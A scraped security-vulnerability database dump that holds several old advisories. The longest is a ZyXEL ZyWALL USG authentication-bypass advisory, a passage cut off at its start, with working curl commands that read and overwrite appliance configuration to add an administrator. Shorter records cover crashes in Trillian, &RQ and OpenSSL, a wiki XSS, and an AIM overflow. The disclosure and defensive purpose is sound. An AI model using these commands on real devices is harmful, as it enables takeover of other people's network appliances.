Listing the contents is\r\npossible:\r\n\r\n $ unzip -l 221BDQ2C0.bin\r\n Archive: 221BDQ2C0.bin\r\n Length Date Time Name\r\n --------- ---------- ----- ----\r\n 40075264 2010-09-15 06:32 compress.img\r\n 0 2010-09-30 04:48 db/\r\n 0 2010-09-30 04:48 db/etc/\r\n 0 2010-09-30 04:48 db/etc/zyxel/\r\n 0 2010-09-30 04:48 db/etc/zyxel/ftp/\r\n 0 2010-09-30 04:48 db/etc/zyxel/ftp/conf/\r\n 20 2010-09-14 14:46 db/etc/zyxel/ftp/conf/htm-default.conf\r\n 7354 2010-09-14 14:46 db/etc/zyxel/ftp/conf/system-default.conf\r\n 0 2010-09-30 04:48 etc_writable/\r\n 0 2010-09-30 04:48 etc_writable/budget/\r\n 0 2010-09-14 15:08 etc_writable/budget/budget.conf\r\n 0 2010-09-15 06:28 etc_writable/firmware-upgraded\r\n 81 2010-09-14 15:09 etc_writable/myzyxel_info.conf\r\n 243 2010-09-14 15:03 etc_writable/tr069ta.conf\r\n 0 2010-09-30 04:48 etc_writable/zyxel/\r\n 0 2010-09-30 04:48 etc_writable/zyxel/conf/\r\n 996 2010-09-15 06:28 etc_writable/zyxel/conf/__eps_checking_default.xml\r\n 42697 2010-09-14 14:46 etc_writable/zyxel/conf/__system_default.xml\r\n 95 2010-09-30 04:48 filechecksum\r\n 1023 2010-09-30 04:48 filelist\r\n 336 2010-09-30 04:48 fwversion\r\n 50 2010-09-15 06:34 kernelchecksum\r\n 3441664 2010-09-30 04:48 kernelusg20.bin\r\n 0 2010-09-14 14:46 wtp_image/\r\n --------- -------\r\n 43569823 24 files\r\n\r\n $ unzip -l 221BDQ2C0.db\r\n Archive: 221BDQ2C0.db\r\n Length Date Time Name\r\n --------- ---------- ----- ----\r\n 0 2009-07-29 04:44 db_remove_lst\r\n 0 2010-09-15 06:28 etc/\r\n 0 2010-09-15 06:35 etc/idp/\r\n 39 2010-09-14 16:08 etc/idp/all.conf\r\n 25 2010-09-14 16:08 etc/idp/attributes.txt\r\n 639 2010-09-14 16:08 etc/idp/attributes_self.txt\r\n 277 2010-09-14 16:08 etc/idp/device.conf\r\n 39 2010-09-14 16:08 etc/idp/dmz.conf\r\n 39 2010-09-14 16:08 etc/idp/lan.conf\r\n 39 2010-09-14 16:08 etc/idp/none.conf\r\n 60581 2010-09-14 16:08 etc/idp/self.ref\r\n 5190 2010-09-14 16:08 etc/idp/self.rules\r\n 0 2010-09-14 16:08 etc/idp/update.ref\r\n 0 2010-09-14 16:08 
etc/idp/update.rules\r\n 39 2010-09-14 16:08 etc/idp/wan.conf\r\n 445075 2010-09-14 16:08 etc/idp/zyxel.ref\r\n 327 2010-09-14 16:08 etc/idp/zyxel.rules\r\n 0 2010-09-14 16:05 etc/zyxel/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/.dha/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/.dha/dha_idp/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/cert/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/cert/trusted/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/conf/\r\n 20 2010-09-14 14:46 etc/zyxel/ftp/conf/htm-default.conf\r\n 7354 2010-09-14 14:46 etc/zyxel/ftp/conf/system-default.conf\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/dev/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/idp/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/packet_trace/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/script/\r\n 1256 2010-09-15 06:35 filelist\r\n --------- -------\r\n 520939 31 files\r\n\r\nDuring a penetration test it was discovered that the file\r\n"221BDQ2C0.conf" (from the unencrypted firmware zip file) has exactly\r\nthe same size as the file "system-default.conf" contained in each\r\nencrypted zip. This can be successfully used for a known-plaintext\r\nattack[1] against these files, afterwards the decrypted zip-files can be\r\nextracted. However, please note that this attack only allows decrypting\r\nthe encrypted zip files, the password used for encrypting the files in\r\nthe first place is not revealed.\r\n\r\nAmong others, the following programs implement this attack:\r\n\r\n * PkCrack by Peter Conrad [2]\r\n * Elcomsoft Advanced Archive Password Recovery [3]\r\n\r\nAfterwards, the file "compress.img" from "221BDQ2C0.bin" can be\r\ndecompressed (e.g. by using the program "unsquashfs"), revealing the\r\nfilesystem for the appliance.\r\n\r\n\r\nWeb-Interface Authentication Bypass\r\n-----------------------------------\r\n\r\nZyWALL USG appliances can be managed over a web-based administrative\r\ninterface offered by an Apache http server. 
The interface requires\r\nauthentication prior to any actions, only some static files can be\r\nrequested without authentication.\r\n\r\nA custom Apache module "mod_auth_zyxel.so" implements the\r\nauthentication, it is configured in etc/service_conf/httpd.conf in the\r\nfirmware (see above). Several Patterns are configured with the directive\r\n"AuthZyxelSkipPattern", all URLs matching one of these patterns can be\r\naccessed without authentication:\r\n\r\n AuthZyxelSkipPattern /images/ /weblogin.cgi /I18N.js /language\r\n\r\nThe administrative interface consists of several programs which are\r\ncalled as CGI scripts. For example, accessing the following URL after\r\nlogging in with an admin account delivers the current startup\r\nconfiguration file:\r\n\r\n https://192.168.0.1/cgi-bin/export-cgi?category=config&arg0=startup-config.conf\r\n\r\nThe Apache httpd in the standard configuration allows appending\r\narbitrary paths to CGI scripts. The server saves the extra path in the\r\nenvironment variable PATH_INFO and executes the CGI script (this can be\r\ndisabled by setting "AcceptPathInfo" to "off"[4]). Therefore, appending\r\nthe string "/images/" and requesting the following URL also executes the\r\n"export-cgi" script and outputs the current configuration file:\r\n\r\n https://192.168.0.1/cgi-bin/export-cgi/images/?category=config&arg0=startup-config.conf\r\n\r\nDuring the penetration test it was discovered that for this URL, no\r\nauthentication is necessary (because the string "/images/" is included\r\nin the path-part of the URL) and arbitrary configuration files can be\r\ndownloaded. The file "startup-config.conf" can contain sensitive data\r\nlike firewall rules and hashes of user passwords. Other interesting\r\nconfig-file names are "lastgood.conf" and "systemdefault.conf".\r\n\r\nThe administrative interface furthermore allows uploading of\r\nconfiguration files with the "file_upload-cgi" script. 
Applying the\r\nsame trick (appending "/images/"), arbitrary configuration files can be\r\nuploaded without any authentication. When the chosen config-file name\r\nis set to "startup-config.conf", the appliance furthermore applies all\r\nsettings directly after uploading. This can be used to add a second\r\nadministrative user with a self-chosen password and take over the\r\nappliance.\r\n\r\n\r\nProof of Concept\r\n================\r\n\r\nThe current startup-config.conf file from a ZyWALL USG appliance can be\r\ndownloaded by accessing the following URL, e.g. with the program cURL:\r\n\r\n $ curl --silent -o startup-config.conf \\\r\n "https://192.168.0.1/cgi-bin/export-cgi/images/?category=config&arg0=startup-config.conf"\r\n\r\nThis file can be re-uploaded (e.g. after adding another administrative\r\nuser) with the following command; the parameter "ext-comp-1121" may need\r\nto be adjusted:\r\n\r\n $ curl --silent -F ext-comp-1121=50 -F file_type=config -F nv=1 \\\r\n -F "file_path=@startup-config.conf;filename=startup-config.conf" \\\r\n https://192.168.0.1/cgi-bin/file_upload-cgi/images/\r\n\r\n\r\nWorkaround\r\n==========\r\n\r\nIf possible, disable the web-based administrative interface or else\r\nensure that the interface is not exposed to attackers.\r\n\r\n\r\nFix\r\n===\r\n\r\nUpgrade to a firmware released on or after April 25, 2011.\r\n\r\n\r\nSecurity Risk\r\n=============\r\n\r\nAny attackers who are able to access the administrative interface of\r\nvulnerable ZyWALL USG appliances can read and write arbitrary configuration\r\nfiles, thus compromising the complete appliance. 
Therefore the risk is\r\nestimated as high.\r\n\r\n\r\nHistory\r\n=======\r\n\r\n2011-03-07 Vulnerability identified\r\n2011-04-06 Customer approved disclosure to vendor\r\n2011-04-07 Vendor notified\r\n2011-04-07 First reactions of vendor, issue is being investigated\r\n2011-04-08 Meeting with vendor\r\n2011-04-15 Vulnerability fixed by vendor\r\n2011-04-18 Test appliance and beta firmware supplied to\r\n RedTeam Pentesting, fix verified\r\n2011-04-25 Vendor released new firmwares with fix\r\n2011-04-29 Vendor confirms that other ZLD-based devices may also be\r\n affected\r\n2011-05-04 Advisory released\r\n\r\nRedTeam Pentesting likes to thank ZyXEL for the fast response and\r\nprofessional collaboration.\r\n\r\n\r\nReferences\r\n==========\r\n\r\n[1] ftp://utopia.hacktic.nl/pub/crypto/cracking/pkzip.ps.gz\r\n[2] http://www.unix-ag.uni-kl.de/~conrad/krypto/pkcrack.html\r\n[3] http://www.elcomsoft.com/archpr.html\r\n[4] http://httpd.apache.org/docs/2.0/mod/core.html#acceptpathinfo\r\n\r\n\r\nRedTeam Pentesting GmbH\r\n=======================\r\n\r\nRedTeam Pentesting offers individual penetration tests, short pentests,\r\nperformed by a team of specialised IT-security experts. Hereby, security\r\nweaknesses in company networks or products are uncovered and can be\r\nfixed immediately.\r\n\r\nAs there are only few experts in this field, RedTeam Pentesting wants to\r\nshare its knowledge and enhance the public knowledge with research in\r\nsecurity related areas. The results are made available as public\r\nsecurity advisories.\r\n\r\nMore information about RedTeam Pentesting can be found at\r\nhttp://www.redteam-pentesting.de.\r\n\r\n\r\n-- \r\nRedTeam Pentesting GmbH Tel.: +49 241 963-1300\r\nDennewartstr. 25-27 Fax : +49 241 963-1304\r\n52068 Aachen http://www.redteam-pentesting.de/\r\nGermany Registergericht: Aachen HRB 14004\r\nGeschäftsführer: Patrick Hof, Jens Liebchen, Claus R. F. 
Overbeck", "modified": "2011-05-05T00:00:00", "published": "2011-05-05T00:00:00", "id": "SECURITYVULNS:DOC:26302", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26302", "title": "[RT-SA-2011-003] Authentication Bypass in Configuration Import and Export of ZyXEL ZyWALL USG Appliances", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:14", "bulletinFamily": "software", "description": "Hi!\r\n\r\nI am using LICQ and when I want to establish a direct connection to Trillian using the ICQ protocol and\r\na reverse connection is requested, Trillian crashes reproducable:\r\n\r\n08:12:36: [TCP] Sending message to xxx (#1).\r\n08:12:36: [PKT] Packet (SRVv0, 38 bytes) sent:\r\n (192.168.0.10:46810 -> 64.12.24.112:5190)\r\n 0000: 2A 02 06 A6 00 20 00 04 00 14 00 00 00 00 00 1F *..\u00a6. ..........\r\n 0010: 00 00 00 00 00 00 00 00 00 01 09 31 32 30 36 38 ...........12068\r\n 0020: 31 35 34 35 00 00 1545..\r\n08:12:36: [TCP] Requesting reverse connection from xxx.\r\n08:12:36: [PKT] Packet (SRVv0, 107 bytes) sent:\r\n (192.168.0.10:46810 -> 64.12.24.112:5190)\r\n 0000: 2A 02 06 A7 00 65 00 04 00 06 00 00 00 00 00 20 *..\u00a7.e.........\r\n 0010: 00 00 00 00 00 00 00 20 00 02 09 31 32 30 36 38 ....... ...12068\r\n 0020: 31 35 34 35 00 05 00 43 00 00 00 00 00 00 00 00 1545...C........\r\n 0030: 00 20 09 46 13 44 4C 7F 11 D1 82 22 44 45 53 54 . .F.DL..\u0421."DEST\r\n 0040: 00 00 00 0A 00 02 00 01 00 0F 00 00 27 11 00 1B ............'...\r\n 0050: 8B 7F 2A 00 3E B2 2D CF A0 0F 00 00 04 0A 04 00 ..*.>\u0406-\u041f .......\r\n 0060: 00 A0 0F 00 00 08 00 20 00 00 00 . ..... 
...\r\n08:12:48: [PKT] Packet (SRVv0, 40 bytes) received:\r\n (192.168.0.10:46810 <- 64.12.24.112:5190)\r\n 0000: 2A 02 53 BF 00 22 00 03 00 0C 00 00 8C F4 C9 18 *.S\u0457.".......\u0444\u0419.\r\n 0010: 09 31 32 30 36 38 31 35 34 35 00 00 00 02 00 01 .120681545......\r\n 0020: 00 02 00 00 00 1D 00 00 ........\r\n08:12:48: [SRV] xxx went offline.\r\n\r\nSeems that Trillian is having a problem with these reverse direct connections. I tested it recently\r\nwith the latest Trillian 3.0.\r\n\r\nThe crash was first reported to Cerulean Studios in their Bug Forum in January:\r\nhttp://ceruleanstudios.com/forums/showthread.php?s=84987af3601384b1dc7ea1f36b237c9c&threadid=64889\r\n\r\nThanks\r\nPhilipp Kolmann\r\n\r\nPS: Please Cc me, since I am not subscribed on the list.", "modified": "2005-10-04T00:00:00", "published": "2005-10-04T00:00:00", "id": "SECURITYVULNS:DOC:9854", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:9854", "title": "Trillian remote crashable", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:20", "bulletinFamily": "software", "description": "Buffer overflow on the links with international domain names (IDN).", "modified": "2005-09-10T00:00:00", "published": "2005-09-10T00:00:00", "id": "SECURITYVULNS:VULN:5190", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:5190", "title": "Netscape / Mozilla / Firefox buffer overflow", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:13", "bulletinFamily": "software", "description": "TITLE:\r\nFreeStyle Wiki Attachments Script 
Insertion Vulnerability\r\n\r\nSECUNIA ADVISORY ID:\r\nSA15538\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/15538/\r\n\r\nCRITICAL:\r\nModerately critical\r\n\r\nIMPACT:\r\nCross Site Scripting\r\n\r\nWHERE:\r\nFrom remote\r\n\r\nSOFTWARE:\r\nFSWikiLite 0.x\r\nhttp://secunia.com/product/5190/\r\nFreeStyle Wiki 3.x\r\nhttp://secunia.com/product/5189/\r\n\r\nDESCRIPTION:\r\nA vulnerability has been reported in FreeStyle Wiki and FSWikiLite,\r\nwhich can be exploited by malicious people to conduct script\r\ninsertion attacks.\r\n\r\nInput passed in uploaded attachments is not properly sanitised before\r\nbeing used. This can be exploited to inject arbitrary HTML and script\r\ncode, which will be executed in a user's browser session in context\r\nof an affected site when the malicious attachment is viewed.\r\n\r\nThe vulnerability has been reported in FreeStyle Wiki 3.5.7 and\r\nFSWikiLite 0.0.10. Prior versions may also be affected.\r\n\r\nSOLUTION:\r\nFreeStyle Wiki:\r\nUpdate to version 3.5.8.\r\nhttps://sourceforge.jp/projects/fswiki/files/?release_id=14798#14798\r\n\r\nFSWikiLite:\r\nUpdate to version 0.0.11.\r\nhttps://sourceforge.jp/projects/fswiki/files/?release_id=14800#14800\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\nReported by vendor.\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keep their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "modified": "2005-06-01T00:00:00", 
"published": "2005-06-01T00:00:00", "id": "SECURITYVULNS:DOC:8765", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:8765", "title": "[SA15538] FreeStyle Wiki Attachments Script Insertion Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:10", "bulletinFamily": "software", "description": "===RUS\r\n\u041f\u0440\u0438 \u0434\u043b\u0438\u043d\u043d\u043e\u043c \u0437\u0430\u043f\u0440\u043e\u0441\u0435 \u043d\u0430 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u044e \u0441\u0442\u0430\u0440\u043e\u0433\u043e \u043e\u0431\u0440\u0430\u0437\u0446\u0430 &RQ \u043b\u044e\u0431\u043e\u0439\r\n\u0432\u0435\u0440\u0441\u0438\u0438 \u0432\u044b\u0434\u0430\u0435\u0442 \u043c\u043d\u043e\u0433\u043e\r\n\u043e\u0448\u0438\u0431\u043e\u043a, \u0432 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0441\u043b\u0443\u0447\u0430\u044f\u0445 \u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f \u043f\u0435\u0440\u0435\u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 \u043a\u043b\u0438\u0435\u043d\u0442\u0430. \u041f\u043e\u0441\u043b\u0435\r\n\u0440\u0430\u0437\u0433\u043e\u0432\u043e\u0440\u0430 \u0441 Rejetto, \u043e\u043d \u043f\u0440\u0438\u0441\u043b\u0430\u043b \u0444\u0430\u0439\u043b \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0439\r\n\u0437\u0430\u043a\u0440\u044b\u0432\u0430\u0435\u0442\r\n\u044d\u0442\u0443 \u0431\u0440\u0435\u0448\u044c.\r\nicq #7000000\r\nrdm-yandex@nnm.ru\r\n\u0441 \u0443\u0432\u0430\u0436\u0435\u043d\u0438\u0435\u043c, RdM-[YanDeX]\r\n\r\n===ENG\r\nAffected: &RQ all versions.\r\n&RQ crashes if long old-type authorization request sent. Rejetto\r\ngave\r\nme solution as non-vulnerable andrq.ini file. 
Exploit attached,\r\nplease\r\nuse it carefully, sometimes some client-side files can be damaged.\r\n\r\ncontacts:\r\nicq #7000000\r\nrdm-yandex@nnm.ru\r\nregards, RdM-[YanDeX]\r\n\r\n\r\n\r\n----andrq.ini\r\nmsg-behaviour=tip(30)+tray+openchat+save+history\r\nurl-behaviour=tip(150)+tray+openchat+save+sound+history\r\ncontacts-behaviour=tray+openchat+save+sound+history\r\nfile-behaviour=tray+save+sound+history\r\nauthreq-behaviour=tray+openchat+save+sound+history\r\naddedyou-behaviour=tray+openchat+save+sound+history\r\noncoming-behaviour=tip(50)+tray+save+sound+history\r\noffgoing-behaviour=tip(50)+save+history\r\nauth-behaviour=tray+openchat+save+sound+history\r\nauthdenied-behaviour=tray+openchat+save+sound+history\r\nstatuschange-behaviour=openchat+save+history\r\nautomsgreq-behaviour=tip(70)+openchat+save+history\r\ngcard-behaviour=tray+openchat+save+sound+history\r\nautomsg-behaviour=openchat+sound+history+popup\r\nonline-disable-blinking=No\r\nonline-disable-tips=No\r\nonline-disable-sounds=No\r\noccupied-disable-blinking=No\r\noccupied-disable-tips=No\r\noccupied-disable-sounds=No\r\ndnd-disable-blinking=Yes\r\ndnd-disable-tips=No\r\ndnd-disable-sounds=Yes\r\nna-disable-blinking=No\r\nna-disable-tips=No\r\nna-disable-sounds=No\r\naway-disable-blinking=No\r\naway-disable-tips=No\r\naway-disable-sounds=No\r\nf4c-disable-blinking=No\r\nf4c-disable-tips=No\r\nf4c-disable-sounds=No\r\nauto-size=No\r\nauto-size-full=Yes\r\npublic-email=No\r\nserver-host=login.icq.com\r\nreopen-chats-on-start=Yes\r\nskip-splash=Yes\r\nfix-windows-position=Yes\r\nflash-chat-window=Yes\r\nstart-minimized=No\r\nauto-reconnect=Yes\r\nuse-last-status=Yes\r\nsingle-tray-click=No\r\nserver-port=5190\r\nlang=default\r\nclose-auth-after-reply=Yes\r\nlast-update-info=51\r\nlast-update-check-time=30/12/1899\r\ncheck-betas=Yes\r\nwheel-velocity=3\r\ninactive-hide=No\r\nget-offline-msgs=No\r\ndel-offline-msgs=No\r\nroaster-bar-on-top=No\r\ninactive-hide-time=10\r\nsend-balloon-on=2\r\nsend-ball
oon-on-date=30/12/1899 13.29.40\r\ndont-save-password=No\r\noncoming-on-away=No\r\nshow-client-id=Yes\r\nauto-connect=No\r\nminimize-roaster=Yes\r\nconnect-on-connection=No\r\nquit-confirmation=No\r\nmin-on-off=No\r\nmin-on-off-time=30\r\nplay-sounds=Yes\r\nlock-on-start=No\r\nok-double-enter-auto-msg=Yes\r\nauto-check-update=No\r\nshow-only-online-contacts=No\r\nshow-only-im-visible-to-contacts=No\r\nshow-oncoming-dialog=No\r\nsend-added-you=No\r\nalways-on-top=Yes\r\nchat-always-on-top=No\r\nshow-statusbar=Yes\r\nwarn-visibility-automsgreq=Yes\r\nsplit-y=62\r\nblink-speed=5\r\ntemp-blink-time=80\r\nshow-contact-tip=Yes\r\nuse-default-browser=No\r\nbrowser-command-line=C:\PROGRA~1\INTERN~1\iexplore.exe -new\r\nclose-button-hides=No\r\npopup-automsg=Yes\r\nsave-not-in-list=No\r\nanimated-roaster=Yes\r\nshow-groups=Yes\r\nvisibility-flag=Yes\r\nuse-smiles=Yes\r\nsend-on-enter=2\r\nsort-by=event\r\nshow-status-on-tabs=Yes\r\nauto-deselect=No\r\nsingle-message-by-default=No\r\nauto-copy=Yes\r\nwebaware=No\r\nauth-needed=Yes\r\nindent-contact-list=No\r\nauto-consume-events=Yes\r\nshow-disconnected-dialog=Yes\r\nitalic-mode=0\r\ndisabled-plugins=plugintest.dll;plugintest2.dll;\r\nkeep-alive=No\r\nkeep-alive-freq=1\r\nfocus-on-chat-popup=No\r\nenable-ignore-list=Yes\r\ntheme=default.theme.ini\r\nrounded-windows=Yes\r\npreferences-height=424\r\ndocking-enabled=Yes\r\ndocking-active=No\r\ndocking-resize=No\r\ndocking-right=Yes\r\ndocking-bak-x=90\r\ndocking-bak-y=7\r\ndocking-bak-width=162\r\ndocking-bak-height=230\r\nautoaway-exit=No\r\nautoaway-away=Yes\r\nautoaway-away-time=600\r\nautoaway-na=Yes\r\nautoaway-na-time=1200\r\nignore-not-in-list=No\r\nignore-pagers=No\r\nspam-ignore-not-in-list=No\r\nspam-ignore-empty-history=No\r\nspam-ignore-bad-words=No\r\nspam-ignore-multisend=No\r\nspam-bad-words=whore;xxx;sex;tits;fuck;britney;bondage;blowjobs;suonerie;webcam;movies;adult;credit\r\ncard;penis\r\nspam-warn=Yes\r\nspam-uin-greater-than=0\r\nhistory-crypt-enabled=No\r\nh
istory-crypt-save-password=No\r\nchat-lsb-popup=Yes\r\nchat-lsb-show=Yes\r\nwindow-top=107\r\nwindow-height=308\r\nwindow-left=729\r\nwindow-width=137\r\nchat-top=158\r\nchat-height=384\r\nchat-left=23\r\nchat-width=517\r\nchat-maximized=No\r\ntransparency=No\r\ntransparency-chat=No\r\ntransparency-active=193\r\ntransparency-inactive=87\r\nproxy=No\r\nproxy-SOCKS5-host=\r\nproxy-SOCKS5-port=1080\r\nproxy-SOCKS4-host=\r\nproxy-SOCKS4-port=1080\r\nproxy-HTTP/S-host=\r\nproxy-HTTP/S-port=8080\r\nproxy-auth=Yes\r\nproxy-user=test\r\nproxy-proto=SOCKS5\r\nstarting-status=na\r\nstarting-visibility=privacy\r\nlog-events-file=Yes\r\nlog-events-window=Yes\r\nlog-events-clear=Yes\r\nlog-packets-file=Yes\r\nlog-packets-window=Yes\r\nlog-packets-clear=Yes\r\nfont-style-codes=Yes\r\nwrite-history=Yes\r\nquote-selected=Yes\r\nquoting-width=300\r\nquoting-cursor-below=No\r\ntexturized-windows=Yes\r\nroaster-title=%uin% %nick%\r\nauto-switch-keyboard-layout=Yes\r\nshow-roaster-minimize-button=Yes\r\nwarn-visibility-exploit=Yes\r\n---end of andrq.ini\r\n\r\n\r\n\r\n-- \r\nBest regards,\r\n RdM-[YanDeX] mailto:rdm-yandex@nnm.ru", "modified": "2004-08-22T00:00:00", "published": "2004-08-22T00:00:00", "id": "SECURITYVULNS:DOC:6645", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6645", "title": "&RQ DoS bug", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:08", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n======================================================================\r\nSecurity advisory 20031002\r\n- ----------------------------------------------------------------------\r\n Product: openssl\r\n Issue date: 2003/10/02\r\nLast updated: 2003/10/02\r\n======================================================================\r\n\r\n\r\n\r\nOpenSSL remote vulnerability\r\n============================\r\n\r\nMr. 
Hornik discovered a remote vulnerability in the OpenSSL package provided\r\nby RedHat. Because of the nature of this bug, some other vendors may be\r\nvulnerable too. The vulnerability is in the SSLv2 server code and\r\nallows killing a remote process that runs the OpenSSL library as an SSL\r\nserver, resulting in a DoS.\r\n\r\nThe vulnerability is different from the one found in the SSLv2 OpenSSL\r\nserver and announced on 2002/07/30.\r\n\r\n\r\nVulnerability\r\n- -------------\r\n\r\nBy constructing a special SSLv2 CLIENT_MASTER_KEY message the following\r\nexecution path can be obtained; we are referring to source lines from\r\nopenssl-0.9.6b-32.7.src.rpm from RH 7.3.\r\n\r\nWhen:\r\ni, the negotiated cipher is an export cipher, for example EXP-RC4-MD5\r\nii, the length of the clear key data is increased, for example by 64 (see below)\r\n\r\nThen this execution path happens:\r\n1, on ssl/s2_srvr.c:419 the condition is_export && (s->s2->tmp.clear+i !=\r\n EVP_CIPHER_key_length(c)) becomes true because of i, and ii,\r\n2, on ssl/s2_srvr.c:424 i is "fixed", but tmp.clear stays unchanged\r\n3, on ssl/s2_srvr.c:450, because is_export is true, the integer variable i\r\n is increased by a big enough value (ii,)\r\n4, on ssl/s2_srvr.c:451 die() causes an abort of the process, leading to DoS\r\n\r\n\r\nWho is affected?\r\n- ----------------\r\n\r\nAffected are all RedHat distributions up to and including version 8.0.\r\nRedHat published a patch on 2003/09/30 silently, without issuing a warning\r\nabout the existence of the vulnerability. RedHat announced the patch in its\r\nadvisory RHSA-2003:291-11.\r\n\r\nopenssl.org sources starting with version 0.9.6f and distribution\r\npackages based on these versions are not vulnerable, because OpenSSL\r\nstarting from 0.9.6f avoids using the die() call because of its\r\npotential risk.\r\n\r\n\r\nRecommendations\r\n- ---------------\r\n\r\nWe recommend upgrading the openssl package to the version issued on\r\n2003/09/30 or later in all RedHat distributions up to 8.0. 
Until the\r\nnew version is installed we recommend disabling SSLv2\r\nfunctionality wherever possible. (In Apache + mod_ssl, for\r\nexample, it is enabled by default and can be disabled; please refer\r\nto the mod_ssl documentation.)\r\n\r\n\r\nReferences\r\n- ----------\r\n\r\nOpenSSL project:\r\nhttp://www.openssl.org/\r\nOpenSSL vulnerability announced on 2002/07/30:\r\nhttp://www.openssl.org/news/secadv_20020730.txt\r\n\r\nThis security advisory:\r\nhttp://www.ebitech.sk/patrik/SA/SA-20031002.txt\r\n\r\n\r\nContact\r\n- -------\r\n\r\nPatrik Hornik\r\n- --\r\nSecurity Consultant\r\n\r\nEmail: patrik.hornik@ebitech.sk\r\nPhone: +421 905 385 666\r\nPGP KeyID: DFA5BC67\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP 6.0.2i\r\n\r\niQA/AwUBP3vPZCTdn3LfpbxnEQLzGACfdijq9XR5t6xZOD5DVpppRALzx9AAn2rn\r\nYSRmV1AzKuatK5UMEJVuJDJM\r\n=ajOd\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2003-10-03T00:00:00", "published": "2003-10-03T00:00:00", "id": "SECURITYVULNS:DOC:5190", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:5190", "title": "New OpenSSL remote vulnerability (issue date 2003/10/02)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:05", "bulletinFamily": "software", "description": "Internet Security Systems Security Alert\r\nJanuary 2, 2002\r\n\r\nAOL Instant Messenger Remote Buffer Overflow\r\n\r\nSynopsis:\r\n\r\nInternet Security Systems (ISS) X-Force has learned of a remote buffer\r\noverflow vulnerability in the popular AOL Instant Messenger (AIM)\r\nsoftware. An exploit for this vulnerability has been released publicly.\r\nThis vulnerability may allow remote attackers to execute arbitrary\r\ncommands on a victim\u2019s system. 
The victim is unable to refuse the\r\nrequest or determine who initiated the attack.\r\n\r\nAffected Versions:\r\n\r\nAOL Instant Messenger versions 4.3 through 4.7.2480 for Windows\r\nAOL Instant Messenger version 4.8.2616 for Windows (beta)\r\n\r\nNote: AOL Instant Messenger versions prior to 4.3 have not been tested.\r\nPrevious versions that contain the Games feature may also be vulnerable.\r\n\r\nDescription:\r\n\r\nThe AOL Instant Messenger program is used by over 100 million users to\r\nsend messages, share and transfer files, talk over the Internet, check\r\nstock prices and headlines, and play games.\r\n\r\nA vulnerability exists in the code that processes game requests, which\r\nmay allow attackers to execute arbitrary code on a remote AIM user\u2019s\r\nsystem. The victim is not able to refuse the game request in order to\r\nblock the exploit. This vulnerability is relatively easy to exploit, and\r\nthe exploit can contain a large and complex payload.\r\n\r\nThis is a serious vulnerability in a very widely used software product.\r\nIf a worm like Code Red or Nimda were written to exploit this\r\nvulnerability, it would likely spread very rapidly, and could\r\npotentially damage both personal and business systems.\r\n\r\n\r\nRecommendations:\r\n\r\nISS X-Force recommends that users upgrade to the latest version of AOL\r\nInstant Messenger as soon as a fix becomes available.\r\n\r\nUntil a fixed version of AOL Instant Messenger is available, system\r\nadministrators are encouraged to block "login.oscar.aol.com" and port\r\n5190 at the firewall. This will prevent AIM users from logging in to the\r\nAIM service.\r\n\r\nISS RealSecure intrusion detection customers may use the following\r\nconnection event to detect access attempts by AOL Instant Messenger\r\nservers to AIM clients, including both normal connections and attempts\r\nto exploit this vulnerability. Follow the instructions below to apply\r\nthe connection event to your policy.\r\n\r\n1. 
